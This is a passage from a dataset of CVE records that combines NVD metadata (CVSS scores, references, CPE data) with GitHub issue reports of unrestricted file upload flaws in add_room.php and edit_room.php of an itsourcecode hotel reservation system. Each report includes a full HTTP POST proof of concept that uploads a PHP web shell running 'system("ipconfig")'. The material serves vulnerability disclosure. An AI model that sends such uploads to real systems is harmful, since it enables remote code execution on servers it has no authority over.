"url": "https://github.com/wangyuan-ui/CVE/issues/5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268867"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268867"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358996"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268867"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268867"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358996"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:clivedelacruz:simple_online_hotel_reservation_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BEE3B1B1-BA46-42EB-BF9A-B1A7D52EF741",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/wangyuan-ui/CVE/issues/5 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wangyuan-ui",
"CVE"
] | # Itsourcecode Simple Online Hotel Reservation System in PHP Project With Source Code 1.0 add_room.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Simple Online Hotel Reservation System in PHP Project With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/simple-hotel-online-reservation-system-php/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ wangyuan-ui
## Vulnerable File
+ add_room.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2018/12/SimpleOnline_HotelReservation.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ In line 8 of the newdriver.php file, the input obtained through $_FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows:
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE
# DESCRIPTION
+ wangyuan-ui discovered that the file upload operation was triggered on line 8 of the 'add_room.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
## Payload
##
```
POST /admin/add_room.php HTTP/1.1
Host: localhost:8103
Content-Length: 2410
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8103
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1bZEIRhzjIw1vaXA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8103/admin/add_room.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary1bZEIRhzjIw1vaXA
Content-Disposition: form-data; name="room_type"
Standard
------WebKitFormBoundary1bZEIRhzjIw1vaXA
Content-Disposition: form-data; name="price"
11
------WebKitFormBoundary1bZEIRhzjIw1vaXA
Content-Disposition: form-data; name="photo"; filename="rce.php"
Content-Type: image/jpeg
Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show
<?php system("ipconfig"); ?>
------WebKitFormBoundary1bZEIRhzjIw1vaXA
Content-Disposition: form-data; name="add_room"
------WebKitFormBoundary1bZEIRhzjIw1vaXA--
```
+ 
## I successfully executed the PHP script on the terminal
+  | Itsourcecode Simple Online Hotel Reservation System in PHP Project With Source Code 1.0 add_room.php Unrestricted Upload | https://api.github.com/repos/wangyuan-ui/CVE/issues/5/comments | 0 | 2024-06-18T04:51:01Z | 2024-06-18T04:51:01Z | https://github.com/wangyuan-ui/CVE/issues/5 | 2,358,892,810 | 5 | 6,096 |
CVE-2024-6116 | 2024-06-18T14:15:12.440 | A vulnerability, which was classified as critical, has been found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this issue is some unknown functionality of the file edit_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268868. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/6"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268868"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268868"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.359002"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268868"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268868"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.359002"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:clivedelacruz:simple_online_hotel_reservation_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BEE3B1B1-BA46-42EB-BF9A-B1A7D52EF741",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/wangyuan-ui/CVE/issues/6 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wangyuan-ui",
"CVE"
] | # Itsourcecode Simple Online Hotel Reservation System in PHP Project With Source Code 1.0 edit_room.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Simple Online Hotel Reservation System in PHP Project With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/simple-hotel-online-reservation-system-php/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ wangyuan-ui
## Vulnerable File
+ edit_room.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2018/12/SimpleOnline_HotelReservation.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ In line 9 of the newdriver.php file, the input obtained through $_FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows:
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE
# DESCRIPTION
+ wangyuan-ui discovered that the file upload operation was triggered on line 9 of the 'edit_room.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
## Payload
##
```
POST /admin/edit_room.php?room_id=5 HTTP/1.1
Host: localhost:8103
Content-Length: 2413
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8103
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTYaxjScwwCSSNWA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8103/admin/edit_room.php?room_id=5
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryGTYaxjScwwCSSNWA
Content-Disposition: form-data; name="room_type"
Standard
------WebKitFormBoundaryGTYaxjScwwCSSNWA
Content-Disposition: form-data; name="price"
3500
------WebKitFormBoundaryGTYaxjScwwCSSNWA
Content-Disposition: form-data; name="photo"; filename="rce.php"
Content-Type: image/jpeg
Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show
<?php system("ipconfig"); ?>
------WebKitFormBoundaryGTYaxjScwwCSSNWA
Content-Disposition: form-data; name="edit_room"
------WebKitFormBoundaryGTYaxjScwwCSSNWA--
```
+ 
## I successfully executed the PHP script on the terminal
+  | Itsourcecode Simple Online Hotel Reservation System in PHP Project With Source Code 1.0 edit_room.php Unrestricted Upload | https://api.github.com/repos/wangyuan-ui/CVE/issues/6/comments | 0 | 2024-06-18T04:55:42Z | 2024-06-18T04:55:42Z | https://github.com/wangyuan-ui/CVE/issues/6 | 2,358,897,857 | 6 | 6,097 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.